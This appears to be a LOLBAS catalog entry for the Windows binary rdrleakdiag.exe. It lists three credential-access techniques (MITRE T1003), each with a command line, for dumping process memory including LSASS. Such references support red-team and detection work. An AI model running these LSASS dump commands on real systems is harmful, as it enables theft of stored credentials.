Catalog LOLBAS

LOL · Binary

rdrleakdiag.exe

3 techniques WindowsLOLBAS GPL-3.0

Dump

Credential Access Windows

Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).

Use Dump process by PID.

rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Context
user
Native
Dump
MITRE
T1003

Dump

Credential Access Windows

Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).

Use Dump LSASS process.

rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Context
admin
Native
Dump

Dump

Credential Access Windows

After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).

Use Dump LSASS process mutliple times.

rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
Context
admin
Native
Dump